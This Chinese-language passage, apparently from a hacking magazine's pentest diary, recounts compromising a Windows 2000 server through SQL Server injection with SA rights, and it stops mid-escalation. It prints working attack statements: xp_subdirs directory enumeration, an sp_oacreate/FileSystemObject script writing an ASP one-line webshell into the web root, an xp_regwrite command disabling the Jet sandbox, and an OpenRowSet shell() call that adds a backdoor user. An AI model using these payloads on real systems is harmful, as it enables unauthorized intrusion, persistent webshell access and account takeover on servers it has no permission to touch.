[攻防手记]记一次简单的渗透测试(图)

    难道SP_OAcreate也不能用？是不是wscript.shell被删了？歇一会，整理下思路重新来，先用xp_subdirs来找WEB目录，语句是exec master.dbo.xp_subdirs ’c":\’，发现服务器只有C、D两个磁盘，并且文件夹也不多。怎么越来越感觉像是数据库服务器呢？不过既然有数据库了也可以找到后台通过后台备份拿个SHELL，不过这个SA要是拿不到服务器权限那真是有点丢人了。用阿D通过刚才的注射点扫一下后台，竟然没扫到，只发现了一个inc目录下有个test.asp 文件，打开后竟然发现了WEB目录。

图6

    原来WEB目录是C:\Inetpub\tianhong\ ，一般感觉管理员都不会用C:\Inetpub这个目录，自己也就没看，差点坏了大事。

    declare @o int, @f int, @t int, @ret int
    exec sp_oacreate ’scripting.filesystemobject’, @o out
    exec sp_oamethod @o, ’createtextfile’, @f out, ’c:\Inetpub\tianhong\2.asp’, 1
    exec @ret = sp_oamethod @f, ’writeline’, NULL,
    ’<%execute(request("a"))%>’

    命令执行成功 看来一句话写进去了，马上使用客户端连一下，连接成功。

图7

    马上传大马准备提权，服务器没什么第三方软件->开始→程序目录不能浏览，2000的操作系统，权限设置的还算严格，看一下终端，一看吓一跳，管理员把终端改成了21端口，第一次碰到。

图8

    在WEBSHELL里转了半天还是没什么收获，感觉还是得靠那个SA来提权，于是笔者问了下朋友，他说你怎么忘了沙盒模式？

    看来最近脑子晕了于是在查询分析器里执行：
    EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SoftWare\Microsoft\Jet\4.0\Engine’,’SandBoxMode’,’REG_DWORD’,’0’

    意思是修改注册表，开启沙盒：

    Select * From OpenRowSet(’Microsoft.Jet.OLEDB.4.0’,’;Database=c:\windows\system32\ias\ias.mdb’,’select shell("net user sadfish fish /add")’);